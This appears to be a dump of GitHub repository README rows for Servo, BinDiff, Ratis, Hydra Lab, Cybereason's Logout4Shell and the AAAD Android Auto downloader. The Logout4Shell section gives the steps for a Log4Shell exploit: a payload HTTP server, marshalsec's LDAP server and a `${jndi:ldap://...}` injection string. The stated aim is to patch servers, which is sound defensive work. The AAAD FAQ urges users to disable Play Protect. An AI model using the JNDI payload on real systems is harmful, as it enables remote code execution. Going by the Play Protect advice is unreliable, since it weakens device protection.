CloudWatch](http://aws.amazon.com/cloudwatch/). - -This has already been implemented inside of Netflix and most of our applications currently use it. - -## Project Details - -### Build Status - -[![Build Status](https://travis-ci.org/Netflix/servo.svg)](https://travis-ci.org/Netflix/servo/builds) - -### Versioning - -Servo is released with a 0.X.Y version because it has not yet reached full API stability. - -Given a version number MAJOR.MINOR.PATCH, increment the: - -* MINOR version when there are binary incompatible changes, and -* PATCH version when new functionality or bug fixes are backwards compatible. 
- -### Documentation - - * [GitHub Wiki](https://github.com/Netflix/servo/wiki) - * [Javadoc](http://netflix.github.io/servo/current/servo-core/docs/javadoc/) - -### Communication - -* Google Group: [Netflix Atlas](https://groups.google.com/forum/#!forum/netflix-atlas) -* For bugs, feedback, questions and discussion please use [GitHub Issues](https://github.com/Netflix/servo/issues). -* If you want to help contribute to the project, see [CONTRIBUTING.md](https://github.com/Netflix/servo/blob/master/CONTRIBUTING.md) for details. - - -## Project Usage - -### Build - -To build the Servo project: - -``` -$ git clone https://github.com/Netflix/servo.git -$ cd servo -$ ./gradlew build -``` - -More details can be found on the [Getting Started](https://github.com/Netflix/servo/wiki/Getting-Started) page of the wiki. - -### Binaries - -Binaries and dependency information can be found at [Maven Central](http://search.maven.org/#search%7Cga%7C1%7Ccom.netflix.servo). - -Maven Example: - -``` - - com.netflix.servo - servo-core - 0.12.7 - -``` - -Ivy Example: - -``` - -``` - -## License - -Copyright 2012-2016 Netflix, Inc. - -Licensed under the Apache License, Version 2.0 (the ""License""); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at: - -http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an ""AS IS"" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -",0 -google/bindiff,Quickly find differences and similarities in disassembled code,2023-09-20T06:41:55Z,,"![BinDiff Logo](docs/images/bindiff-lockup-vertical.png) - -Copyright 2011-2024 Google LLC. - -# BinDiff - -This repository contains the BinDiff source code. 
BinDiff is an open-source
-comparison tool for binary files to quickly find differences and similarities
-in disassembled code.
-
-## Table of Contents
-
-- [About BinDiff](#about-bindiff)
-- [Quickstart](#quickstart)
-- [Documentation](#documentation)
-- [Codemap](#codemap)
-- [Building from Source](#building-from-source)
-- [License](#license)
-- [Getting Involved](#getting-involved)
-
-## About BinDiff
-
-BinDiff is an open-source comparison tool for binary files that assists
-vulnerability researchers and engineers in quickly finding differences and
-similarities in disassembled code.
-
-With BinDiff, researchers can identify and isolate fixes for vulnerabilities in
-vendor-supplied patches. It can also be used to port symbols and comments
-between disassemblies of multiple versions of the same binary. This makes
-tracking changes over time easier, allows organizations to retain analysis
-results, and enables knowledge transfer among binary analysts.
-
-### Use Cases
-
-* Compare binary files for x86, MIPS, ARM, PowerPC, and other architectures
-  supported by popular [disassemblers](docs/disassemblers.md).
-* Identify identical and similar functions in different binaries
-* Port function names, comments and local names from one disassembly to the
-  other
-* Detect and highlight changes between two variants of the same function
-
-## Quickstart
-
-If you want to just get started using BinDiff, download prebuilt installation
-packages from the
-[releases page](https://github.com/google/bindiff/releases).
-
-Note: BinDiff relies on a separate disassembler. Out of the box, it ships with
-support for IDA Pro, Binary Ninja and Ghidra. The [disassemblers page](docs/disassemblers.md) lists the supported configurations.
-
-## Documentation
-
-A subset of the existing [manual](https://www.zynamics.com/bindiff/manual) is
-available in the [`docs/` directory](docs/README.md). 
-
-## Codemap
-
-BinDiff contains the following components:
-
-* [`cmake`](cmake) - CMake build files declaring external dependencies
-* [`fixtures`](fixtures) - A collection of test files to exercise the BinDiff
-  core engine
-* [`ida`](ida) - Integration with the IDA Pro disassembler
-* [`java`](java) - Java source code. This contains the BinDiff visual diff
-  user interface and its corresponding utility library.
-* [`match`](match) - Matching algorithms for the BinDiff core engine
-* [`packaging`](packaging) - Package sources for the installation packages
-* [`tools`](tools) - Helper executables that are shipped with the product
-
-## Building from Source
-
-The instructions below should be enough to build both the native code and the
-Java based components.
-
-More detailed build instructions will be added at a later date. This includes
-ready-made `Dockerfile`s and scripts for building the installation packages.
-
-### Native code
-
-BinDiff uses CMake to generate its build files for those components that consist
-of native C++ code.
-
-The following build dependencies are required:
-
-* [BinExport](https://github.com/google/binexport) 12, the companion plugin
-  to BinDiff that also contains a lot of shared code
-* Boost 1.71.0 or higher (a partial copy of 1.71.0 ships with BinExport and
-  will be used automatically)
-* [CMake](https://cmake.org/download/) 3.14 or higher
-* [Ninja](https://ninja-build.org/) for speedy builds
-* GCC 9 or a recent version of Clang on Linux/macOS. On Windows, use the
-  Visual Studio 2019 compiler and the Windows SDK for Windows 10.
-* Git 1.8 or higher
-* Dependencies that will be downloaded:
-  * Abseil, GoogleTest, Protocol Buffers (3.14), and SQLite3
-  * Binary Ninja SDK
-
-The following build dependencies are optional:
-
-* IDA Pro only: IDA SDK 8.0 or higher (unpack into `deps/idasdk`)
-
-The general build steps are the same on Windows, Linux and macOS. The following
-shows the commands for Linux. 
-
-Download dependencies that won't be downloaded automatically:
-
-```bash
-mkdir -p build/out
-git clone https://github.com/google/binexport build/binexport
-unzip -q -d build/idasdk
-```
-
-Next, configure the build directory and generate build files:
-
-```bash
-cmake -S . -B build/out -G Ninja \
-    -DCMAKE_BUILD_TYPE=Release \
-    -DCMAKE_INSTALL_PREFIX=build/out \
-    -DBINDIFF_BINEXPORT_DIR=build/binexport \
-    ""-DIdaSdk_ROOT_DIR=${PWD}/build/idasdk""
-```
-
-Finally, invoke the actual build. Binaries will be placed in
-`build/out/bindiff-prefix`:
-
-```bash
-cmake --build build/out --config Release
-(cd build/out; ctest --build-config Release --output-on-failure)
-cmake --install build/out --config Release
-```
-
-### Building without IDA
-
-To build without IDA, simply change the above configuration step to
-
-```bash
-cmake -S . -B build/out -G Ninja \
-    -DCMAKE_BUILD_TYPE=Release \
-    -DCMAKE_INSTALL_PREFIX=build/out \
-    -DBINDIFF_BINEXPORT_DIR=build/binexport \
-    -DBINEXPORT_ENABLE_IDAPRO=OFF
-```
-
-### Java GUI and yFiles
-
-Building the Java based GUI requires the commercial third-party graph
-visualisation library [yFiles](https://www.yworks.com/products/yfiles) for graph
-display and layout. This library is immensely powerful, and not easily
-replaceable.
-
-To build, BinDiff uses Gradle 6.x and Java 11 LTS. Refer to its
-[installation guide](https://docs.gradle.org/6.8.3/userguide/installation.html)
-for instructions on how to install.
-
-Assuming you are a yFiles license holder, set the `YFILES_DIR` environment
-variable to a directory containing the yFiles `y.jar` and `ysvg.jar`.
-
-Note: BinDiff still uses the older 2.x branch of yFiles. 
-
-Then invoke Gradle to download external dependencies and build:
-
-Windows:
-```
-set YFILES_DIR=
-cd java
-gradle shadowJar
-```
-
-Linux or macOS:
-
-```
-export YFILES_DIR=
-cd java
-gradle shadowJar
-```
-
-Afterwards the directory `ui/build/libs` in the `java` sub-directory should
-contain the self-contained `bindiff-ui-all.jar` artifact, which can be run
-using the standard `java -jar` command.
-
-## Further reading / Similar tools
-
-The original papers outlining the general ideas behind BinDiff:
-
-* Thomas Dullien and Rolf Rolles. *Graph-Based Comparison of Executable
-  Objects*. [bindiffsstic05-1.pdf](docs/papers/bindiffsstic05-1.pdf).
-  SSTIC ’05, Symposium sur la Sécurité des Technologies de l’Information et des
-  Communications. 2005.
-* Halvar Flake. *Structural Comparison of Executable Objects*.
-  [dimva_paper2.pdf](docs/papers/dimva_paper2.pdf). pp 161-173. Detection of
-  Intrusions and Malware & Vulnerability Assessment. 2004. ISBN 3-88579-375-X.
-
-Other tools in the same problem space:
-
-* [Diaphora](https://github.com/joxeankoret/diaphora), an advanced program
-  diffing tool implementing many of the same ideas.
-* [TurboDiff](https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs), a now-defunct program diffing plugin for IDA Pro.
-
-Projects using BinDiff:
-
-* [VxSig](https://github.com/google/vxsig), a tool to automatically generate
-  AV byte signatures from sets of similar binaries.
-
-## License
-
-BinDiff is licensed under the terms of the Apache license. See
-[LICENSE](LICENSE) for more information.
-
-## Getting Involved
-
-If you want to contribute, please read [CONTRIBUTING.md](CONTRIBUTING.md)
-before sending pull requests. You can also report bugs or file feature
-requests. 
-",0
-apache/ratis,Open source Java implementation for Raft consensus protocol.,2017-01-31T08:00:07Z,,"
-
-# Apache Ratis
-*[Apache Ratis]* is a Java library that implements the Raft protocol [1],
-where an extended version of the Raft paper is available.
-The paper introduces Raft and states its motivations in the following words:
-
-> Raft is a consensus algorithm for managing a replicated log.
-> It produces a result equivalent to (multi-)Paxos, and it is as efficient as Paxos,
-> but its structure is different from Paxos; this makes Raft more understandable than Paxos
-> and also provides a better foundation for building practical systems.
-
-Ratis aims to make Raft available as a Java library that can be used by any system that needs to use a replicated log.
-It provides pluggability for state machine implementations to manage replicated states.
-It also provides pluggability for Raft log, RPC, and metric implementations to make it easy to integrate with other projects.
-Another important goal is to support high throughput data ingest so that it can be used for more general data replication use cases.
-
-* To build the artifacts, see [BUILDING.md](BUILDING.md).
-* To run the examples, see [ratis-examples/README.md](ratis-examples/README.md).
-
-## Reference
-1. Diego Ongaro and John Ousterhout,
-_[In Search of an Understandable Consensus Algorithm][Ongaro2014]_,
-2014 USENIX Annual Technical Conference (USENIX ATC 14) (Philadelphia, PA), USENIX Association, 2014, pp. 305-319.
-
-[Ongaro2014]: https://www.usenix.org/conference/atc14/technical-sessions/presentation/ongaro
-
-[Apache Ratis]: https://ratis.apache.org/
-",0
-microsoft/HydraLab,Intelligent cloud testing made easy.,2022-04-28T09:18:16Z,,"

# Hydra Lab

### Build your own cloud testing infrastructure

- -[中文(完善中)](README.zh-CN.md) - -[![Build Status](https://dlwteam.visualstudio.com/Next/_apis/build/status/HydraLab-CI?branchName=main)](https://dlwteam.visualstudio.com/Next/_build/latest?definitionId=743&branchName=main) -![Spring Boot](https://img.shields.io/badge/Spring%20Boot-v2.2.5-blue) -![Appium](https://img.shields.io/badge/Appium-v8.0.0-yellow) -![License](https://img.shields.io/badge/license-MIT-green) - ---- - -https://github.com/microsoft/HydraLab/assets/8344245/cefefe24-4e11-4cc7-a3af-70cb44974735 - -[What is Hydra Lab?](#what-is) | [Get Started](#get-started) | [Contribute](#contribute) | [Contact Us](#contact) | [Wiki](https://github.com/microsoft/HydraLab/wiki) -
- - -## What is Hydra Lab? - -As mentioned in the above video, Hydra Lab is a framework that can help you easily build a cloud-testing platform utilizing the test devices/machines in hand. - -Capabilities of Hydra Lab include: -- Scalable test device management under the center-agent distributed design; Test task management and test result visualization. -- Powering [Android Espresso Test](https://developer.android.com/training/testing/espresso), and Appium(Java) test on different platforms: Windows/iOS/Android/Browser/Cross-platform. -- Case-free test automation: Monkey test, Smart exploratory test. - -For more details, you may refer to: -- [Introduction: What is Hydra Lab?](https://github.com/microsoft/HydraLab/wiki) -- [How Hydra Lab Empowers Microsoft Mobile Testing and Test Intelligence](https://medium.com/microsoft-mobile-engineering/how-hydra-lab-empowers-microsoft-mobile-testing-e4bd831ecf41) - - -## Get Started - -Please visit our **[GitHub Project Wiki](https://github.com/microsoft/HydraLab/wiki)** to understand the dev environment setup procedure: [Contribution Guideline](CONTRIBUTING.md). - -**Supported environments for Hydra Lab agent**: Windows, Mac OSX, and Linux ([Docker](https://github.com/microsoft/HydraLab/blob/main/agent/README.md#run-agent-in-docker)). - -**Supported platforms and frameworks matrix**: - -| | Appium(Java) | Espresso | XCTest | Maestro | Python Runner | -| ---- |--------------|---- | ---- | ---- | --- | -|Android| ✔ | ✔ | x | ✔ | ✔ | -|iOS| ✔ | x | ✔ | ✔ | ✔ | -|Windows| ✔ | x | x | x | ✔ | -|Web (Browser)| ✔ | x | x | x | ✔ | - - -### Quick guide on out-of-box Uber docker image - -Hydra Lab offers an out-of-box experience of the Docker image, and we call it `Uber`. You can follow the below steps and start your docker container with both a center instance and an agent instance: - -**Step 1. Download and install [Docker](https://www.docker.com)** - -**Step 2. 
Download the latest Uber Docker image**
-```bash
-docker pull ghcr.io/microsoft/hydra-lab-uber:latest
-```
-**This step is necessary.** If you skip it and jump straight to step 3, you may end up running a locally cached Docker image tagged `latest` if one exists.
-
-**Step 3. Run on your machine**
-
-By default, Hydra Lab will use the local file system as a storage solution, and you may type the following in your terminal to run it:
-
-```bash
-docker run -p 9886:9886 --name=hydra-lab ghcr.io/microsoft/hydra-lab-uber:latest
-```
-
-> We strongly recommend using [Azure Blob Storage](https://azure.microsoft.com/en-us/products/storage/blobs/) service as the file storage solution, and Hydra Lab has native, consistent, and validated support for it.
-
-**Step 4. Visit the web page and view your connected devices**
-
-> Url: http://localhost:9886/portal/index.html#/ (or your custom port).
-
-Enjoy starting your journey of exploration!
-
-**Step 5. Perform the test procedure with a minimal setup**
-
-Note: For Android, the Uber image only supports **Espresso/Instrumentation** tests. See the ""User Manual"" section on this page for more features: [Hydra Lab Wikis](https://github.com/microsoft/HydraLab/wiki).
-
-**To run a test with Uber image and local storage:**
-- On the front-end page, go to the `Runner` tab and select `HydraLab Client`.
-- Click `Run` and change ""Espresso test scope"" to `Test app`, click `Next`.
-- Pick an available device, click `Next` again, and click `Run` to start the test.
-- When the test is finished, you can view the test result in the `Task` tab on the left navigator of the front-end page.
-
-![Test trigger steps](docs/images/test-trigger-steps.png)
-
-
-### Build and run Hydra Lab from the source
-
-You can also run the center java Spring Boot service (a runnable Jar) separately with the following commands:
-
-> The build and run process will require JDK11 | NPM | Android SDK platform-tools in place.
-
-**Step 1. 
Run Hydra Lab center service**
-
-```bash
-# In the project root, switch to the react folder to build the Web front.
-cd react
-npm ci
-npm run pub
-# Get back to the project root, and build the center runnable Jar.
-cd ..
-# For the gradlew command, if you are on Windows please replace it with `./gradlew` or `./gradlew.bat`
-gradlew :center:bootJar
-# Run it, and then visit http://localhost:9886/portal/index.html#/
-java -jar center/build/libs/center.jar
-# Then visit http://localhost:9886/portal/index.html#/auth to generate a new agent ID and agent secret.
-```
-
-> If you encounter the error: `Error: error:0308010C:digital envelope routines::unsupported`, set the System Variable `NODE_OPTIONS` as `--openssl-legacy-provider` and then restart the terminal.
-
-**Step 2. Run Hydra Lab agent service**
-
-```bash
-# In the project root
-cd android_client
-# Build the Android client APK
-./gradlew assembleDebug
-cp app/build/outputs/apk/debug/app-debug.apk ../common/src/main/resources/record_release.apk
-# If you don't have the SDK for Android, you can download the prebuilt APK from https://github.com/microsoft/HydraLab/releases
-# Back to the project root
-cd ..
-# In the project root, copy the sample config file and update:
-# YOUR_AGENT_NAME, YOUR_REGISTERED_AGENT_ID and YOUR_REGISTERED_AGENT_SECRET.
-cp agent/application-sample.yml application.yml
-# Then build an agent jar and run it
-gradlew :agent:bootJar
-java -jar agent/build/libs/agent.jar
-```
-
-**Step 3. 
Visit http://localhost:9886/portal/index.html#/ and view your connected devices**
-
-### More integration guidelines:
-
-- [Test agent setup](https://github.com/microsoft/HydraLab/wiki/Test-agent-setup)
-- [Trigger a test task run in the Hydra Lab test service](https://github.com/microsoft/HydraLab/wiki/Trigger-a-test-task-run-in-the-Hydra-Lab-test-service)
-- [Deploy Center Docker Container](https://github.com/microsoft/HydraLab/wiki/Deploy-Center-Docker-Container)
-
-
-## Contribute
-
-Your contribution to Hydra Lab will make a difference for the entire test automation ecosystem. Please refer to **[CONTRIBUTING.md](CONTRIBUTING.md)** for instructions.
-
-### Contributor Hero Wall:
-
-
-
-
-## Contact Us
-
-You can reach us by [opening an issue](https://github.com/microsoft/HydraLab/issues/new) or [sending us an email](mailto:hydra_lab_support@microsoft.com).
-
-
-
-## Microsoft Give Sponsors
-
-Thank you for your contribution to [Microsoft employee giving program](https://aka.ms/msgive) in the name of Hydra Lab:
-
-[@Germey(崔庆才)](https://github.com/Germey), [@SpongeOnline(王创)](https://github.com/SpongeOnline), [@ellie-mac(陈佳佩)](https://github.com/ellie-mac), [@Yawn(刘俊钦)](https://github.com/Aqinqin48), [@White(刘子凡)](https://github.com/jkfhklh), [@597(姜志鹏)](https://github.com/JZP1996), [@HCG(尹照宇)](https://github.com/mahoshojoHCG)
-
-
-## License & Trademarks
-
-The entire codebase is under [MIT license](https://github.com/microsoft/HydraLab/blob/main/LICENSE).
-
-This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow [Microsoft’s Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general). Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos is subject to those third parties’ policies. 
-
-We use the Microsoft Clarity Analysis Platform for the front-end client data dashboard; please refer to [Clarity Overview](https://learn.microsoft.com/en-us/clarity/setup-and-installation/about-clarity) and https://clarity.microsoft.com/ to learn more.
-
-Instructions to turn off Clarity:
-
-Open [MainActivity](https://github.com/microsoft/HydraLab/blob/main/android_client/app/src/main/java/com/microsoft/hydralab/android/client/MainActivity.java), comment out the line which calls initClarity(), rebuild the Hydra Lab Client apk, and replace the one in the agent resources folder.
-
-[Telemetry/data collection notice](https://docs.opensource.microsoft.com/releasing/general-guidance/telemetry)
-
-",0
-Cybereason/Logout4Shell,Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell,2021-12-10T22:38:53Z,,"# Logout4Shell
-![logo](https://github.com/Cybereason/Logout4Shell/raw/main/assets/CR_logo.png)
-
-## Description
-
-A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s GitHub on December 9, 2021.
-The flaw has been dubbed “Log4Shell” and has the highest possible severity rating of 10. Software made or
-managed by the Apache Software Foundation (from here on just ""Apache"") is pervasive and comprises nearly a third of all
-web servers in the world—making this a potentially catastrophic flaw.
-The Log4Shell vulnerability CVE-2021-44228 was published on 12/9/2021 and allows remote code execution on vulnerable servers.
-
-
-While the best mitigation against these vulnerabilities is to patch log4j to
-~~2.15.0~~2.17.0 and above, in Log4j version (>=2.10) this behavior can be partially mitigated (see below) by
-setting system property `log4j2.formatMsgNoLookups` to `true` or by removing
-the JndiLookup class from the classpath.
-
-On 12/14/2021 the Apache software foundation disclosed CVE-2021-45046 which was patched in log4j version 2.16.0. 
This
-vulnerability showed that in certain scenarios, for example, where attackers can control a thread-context variable that
-gets logged, even the flag `log4j2.formatMsgNoLookups` is insufficient to mitigate Log4Shell. An
-additional, less severe CVE, CVE-2021-45105, was discovered. This vulnerability exposes the server to
-an infinite recursion that could crash the server in some scenarios. It is recommended to upgrade to
-2.17.0.
-
-However, enabling this system property requires access to the vulnerable servers as well as a restart.
-The [Cybereason](https://www.cybereason.com) research team has developed the
-following code that _exploits_ the same vulnerability and the payload therein
-sets the vulnerable setting as disabled. The payload then searches
-for all `LoggerContext` and removes the JNDI `Interpolator`, preventing even recursive abuses.
-This effectively blocks any further attempt to exploit Log4Shell on this server.
-
-This Proof of Concept is based on [@tangxiaofeng7](https://github.com/tangxiaofeng7)'s [tangxiaofeng7/apache-log4j-poc](https://github.com/tangxiaofeng7/apache-log4j-poc)
-
-However, this project attempts to fix the vulnerability by using the bug against itself.
-You can learn more about Cybereason's ""vaccine"" approach to the Apache Log4Shell vulnerability (CVE-2021-44228) on our website.
-
-Learn more: [Cybereason Releases Vaccine to Prevent Exploitation of Apache Log4Shell Vulnerability (CVE-2021-44228)](https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228)
-
-## Supported versions
-Logout4Shell supports log4j versions 2.0 - 2.14.1
-
-## How it works
-On versions (>= 2.10.0) of log4j that support the configuration `FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS`, this value is
-set to `True`, disabling the lookup mechanism entirely. 
As disclosed in CVE-2021-45046, setting this flag is insufficient,
-therefore the payload searches all existing `LoggerContexts` and removes the JNDI key from the `Interpolator` used to
-process `${}` fields. This means that even other recursive uses of the JNDI mechanisms will fail.
-Then, the log4j jarfile will be remade and patched. The patch is included in this
-git repository; however, it is not needed in the final build because the real patch
-is included in the payload as Base64.
-
-In Persistent mode (see [below](#transient-vs-persistent-mode)), the payload additionally attempts to locate the `log4j-core.jar`,
-remove the `JndiLookup` class, and modify the PluginCache to completely remove the JNDI plugin. Upon subsequent JVM
-restarts the `JndiLookup` class cannot be found and log4j will no longer support JNDI.
-
-## Transient vs Persistent mode
-This package generates two flavors of the payload - Transient and Persistent.
-In Transient mode, the payload modifies
-the current running JVM. The payload is very careful to touch only the logger context and configuration. We thus
-believe the risks of using the Transient mode are very low on production environments.
-
-Persistent mode performs all the changes of the Transient mode and *in addition* searches for the jar from which `log4j`
-loads the `JndiLookup` class. It then attempts to modify this jar by removing the `JndiLookup` class as well as
-modifying the plugin registry. There is inherently more risk in this approach, as if the `log4j-core.jar` becomes
-corrupted, the JVM may crash on start.
-
-The choice of which mode to use is selected by the URL given in step [2.3](#execution) below. The
-class `Log4jRCETransient` selects the Transient mode and the class `Log4jRCEPersistent` selects the Persistent mode.
-
-Persistent mode is based on the work of [TudbuT](https://github.com/TudbuT). Thank you!
-
-## How to use
-
-1. 
Download this repository and build it
-
-    1.1 `git clone https://github.com/cybereason/Logout4Shell.git`
-
-    1.2 build it - `mvn package`
-
-    1.3 `cd target/classes`
-
-    1.4 run the webserver - `python3 -m http.server 8888`
-
-2. Download, build and run Marshalsec's LDAP server
-
-    2.1 `git clone https://github.com/mbechler/marshalsec.git`
-
-    2.2 `mvn package -DskipTests`
-
-    2.3 `cd target`
-
-    2.4 `java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""http://:8888/#Log4jRCE""`
-
-3. To immunize a server
-
-    3.1 enter `${jndi:ldap://:1389/a}` into a vulnerable field (such as user name)
-
-
-## DISCLAIMER:
-The code described in this advisory (the “Code”) is provided on an “as is” and
-“as available” basis and may contain bugs, errors and other defects. You are
-advised to safeguard important data and to use caution. By using this Code, you
-agree that Cybereason shall have no liability to you for any claims in
-connection with the Code. Cybereason disclaims any liability for any direct,
-indirect, incidental, punitive, exemplary, special or consequential damages,
-even if Cybereason or its related parties are advised of the possibility of
-such damages. Cybereason undertakes no duty to update the Code or this
-advisory.
-
-## License
-The source code for the site is licensed under the MIT license, which you can find in the LICENSE file.
-",0
-shmykelsa/AAAD,,2021-04-28T07:36:37Z,,"# AAAD [![Crowdin](https://badges.crowdin.net/aaad/localized.svg)](https://crowdin.com/project/aaad)
-
-
-![banner](https://i.imgur.com/EeT5Y3v.png)
-
-
-Android Auto Apps Downloader (AAAD) is an app for Android Phones that downloads popular Android Auto 3rd party apps and installs them in the correct way to have them in Android Auto.
-
-For the first time in 3 years, users with **non-rooted Android devices** can enjoy these apps made for Android Auto, and Android Auto Apps Downloader does it all for you. 
Simply select an app you want to install on your phone and the download will begin. Once completed, install the given app with the classic Android interface and you can start enjoying the app you’ve just downloaded on Android Auto.
-
-### No need for a PC. No developer options. No need to grab APKs and patch them. No root needed
-
-AAAD can be easily installed on any Android phone and the whole installing process takes place only on it. You will not need to activate developer settings, neither in main settings nor in Android Auto.
-
-The main goal of this app is having the listed apps in Android Auto with a pain-free experience and, most of all, without requiring a rooted phone.
-
-If you are instead running a rooted device, you might want to consider the free alternative [AA AIO TWEAKER](https://github.com/shmykelsa/AA-Tweaker), which has an alternative root method to patch the apps and a lot of other cool features that you can activate or pre-activate on Android Auto!
-
-AAAD is free and offers in-app purchases. The free version of the app allows up to 1 download every 30 days. With the PRO version you can enjoy the full experience and download as many times as you want, forever! 
- -# 🚨🚨‼‼ KNOWN ISSUES ‼‼🚨🚨 - -**Oppo/Realme/OnePlus devices won't show apps or ""No messages during drive""** - Please apply [this fix](https://github.com/shmykelsa/AAAD/wiki/Fix-for-OnePlus-Realme-Oppo) - -**Google Pixel: ""No new messages during drive"" - Android 13** - Please apply [this fix](https://github.com/shmykelsa/AAAD/wiki/Fix-for-Pixel-Android-13-) before installing - -**Android 14: Not compatible as of now** - -**""This organization is currently ineligible to receive donations"" - Please download AAAD only from this website, 3rd party downloads are not authorized, endorsed nor supported by our staff** - - **GiroPay/Ideal/Przelewy24/Bancontact/EPS Payment has not been recognized by the app - Please follow[ this link](mailto:help.aaad@gmail.com?subject=AAADSI&body=Hello%2C%0D%0A%0D%0Athis%20is%20a%20pre-formatted%20e-mail.%20Please%20DO%20NOT%20edit%20the%20subject%20above%20and%20modify%20the%20e-mail%20with%20the%20right%20details.%20After%20sending%20the%20e-mail%20you%20will%20receive%20instructions%20on%20how%20to%20activate%20from%20email%20help.aaad%2Bcanned.response%40gmail.com.%20Please%20also%20check%20spam%20folder%20if%20nothing%20came%20to%20you.%0D%0A%0D%0AMethod%20of%20payment%3A%0D%0ALast%20four%20(4)%20digits%20of%20the%20card%20used%20(if%20applicable)%3A%0D%0ADate%20(and%20time%20if%20possible)%3A%0D%0AFull%20name%3A%0D%0A%0D%0A)** - -**Fermata Auto download shows ""App not responding (wait or close)""** - Fermata is quite heavy to download and GitHub servers are not the easiest with downloads. Please keep pressing on ""wait"". If it does fail, select top menu, select help and contact us through the app describing the steps you take to reproduce the issue. 
-
-**A factory reset wipes the license away** - [Click here](mailto:help.aaad@gmail.com?subject=PROWIPED&body=Hello%2C%0D%0A%0D%0Amy%20license%20was%20lost%20after%20a%20device%20reset.%0D%0A%0D%0AThe%20e-mail%20I%E2%80%99ve%20registered%20for%20my%20payment%20is%3A%20****MODIFY%20HERE****%0D%0A%0D%0ARegards%0D%0A%0D%0A>)
-
-**Google Play Protect erased the downloaded apps** - There's a deeper explanation [down here](#i-have-a-warning-from-google-play-protect-warning-me-about-your-app-is-this-app-a-malware). Please take a deep look before proceeding with installing any app. The install button is usually hidden and the big blue button **WILL NOT** install the app you've chosen. Please use the ""Install anyway"" button instead.
-
-
-### [GO TO DOWNLOAD](https://github.com/shmykelsa/AAAD/releases)
-
-### Updates
-
-If you want to stay updated with development, you can check out the [dedicated Telegram Channel](https://t.me/AAADupdates). Be sure to watch the repository with the banner on the top right; you will be notified via mail if AAAD gets updated (GitHub account needed)! Star us if you really think AAAD is good software :)
-
-The PRO version of the app can be activated directly and automatically inside the app; it will be bound to one device, and the PRO or FREE version (including the date of next download) of the app will survive app uninstall.
-
-# Notes
-
-Android Auto Apps Downloader **does not guarantee** in any way that the provided apps available for installing will actually work on Android Auto. The installing method can fail anytime if Google applies changes to Android Auto. Any software installed by Android Auto Apps Downloader is provided ""as is"" and no support can be given by me for malfunctioning apps or malfunctioning Android Auto.
-
-# F.A.Q.
-
-### How can I have support for this app?
-
-You can contact the help team through the AAAD app (top right menu > ""help""). 
We are a very small team working from Italy so please keep patience with us in case you write us over night! - -### How do I obtain a license? - -To get started, press the bottom text of the AAAD app. - -### Can I pay for a license outside the app? - -Sure you can. Feel free to [pay through Stripe](https://buy.stripe.com/14k5mQ3ih6l7dMs8ww) or donate any amount (equal or bigger than the asking price - 3.50 EUR) [via PayPal](https://www.paypal.com/donate/?hosted_button_id=V666UVPT9C5CJ), and keep the donation receipt (bank statement, confirmation page, e-mail etc.). Then please [click here](mailto:help.aaad@gmail.com?subject=%5BGW%5D&body=Please%20don%E2%80%99t%20modify%20the%20subject%20above%20and%20feel%20free%20to%20modify%20this%20body%20leaving%20a%20small%20thought.%20An%20automatic%20response%20will%20then%20guide%20you%20to%20the%20following%20steps%20%3A)) or write an e-mail to help.aaad@gmail.com and write ""[GW]"" in the subject, and be sure to include also a small thought :). An automatic reply will guide you to the stepts to take after. - -### What will a license of AAAD give me? - -The license for AAAD pro will give you access to unlimited downloads. - -### Do I have to buy a license to have the apps working while the vehicle is not parked? - -No. AAAD pro does only give access to unlimited downloads. - -### I've downloaded the app ""xxx"" from AAAD but it's not working well. What can I do? - -The best thing is to ask the app's developer as we do not offer support for the apps inside AAAD. The apps are provided ""as-is"", and being developed by someone else, nobody from AAAD will be able to give the proper technical support for them. As long as the app is listed on Android Auto, apart from the ""No new messages during drive"" bug, then AAAD is working just as designed. If your app is not listed at all or suffers from the ""No new messages during drive"" contact help through AAAD app (top right menu > ""help""). - -### Why the heck do I need this app? 
Can’t I just install the apps by myslef? - -Well yes, you could, but they would not appear in Android Auto. Since the beginning of 2018 the custom apps for Android Auto are blocked by Google, but AAAD installs them in a special way in order to actually see the apps on Android Auto. And no root is needed! Call it magic, if you will. If you have a rooted phone, check out [AA AIO TWEAKER](https://github.com/shmykelsa/AA-Tweaker) instead. - -### I have a warning from Google Play Protect warning me about your app! Is this app a malware? - -AAAD does not contain any malware, and neither the apps inside it. Google obviously doesn't like Android Auto modding because of driving security. If you want to avoid any warning you'd want to know that Google Play Protect does not really have any anti-virus feature, rather it just warns of apps that Google doesn't like because of various reasons (e.g. installing other apps like Google Play Store does or contain third party in app purchase system). You can safely disable it by heading into Google Play Store's settings. - -### Why only these apps? Where is YouTube? Where is Netflix? Where is Instagram? - -Not all apps are compatible with Android Auto. You can’t just pick an app and sledge-hammer it into Android Auto. As a rule of thumb, no app from Google Play Store will be ever included in AAAD (unless such app has a different APK distributed in another platform). Apps coming from the Play Store are automatically available on Android Auto. Obviously, Google allows only certain types of apps on its store (navigation, music, messages, VOIP). Whenever an app implements Android Auto as functionality, it can't be falling in a different category from the ones allowed by Google. - -AAAD includes basically almost every Android Auto app known to date, and the only responsibility of AAAD is to make them available in Android Auto. 
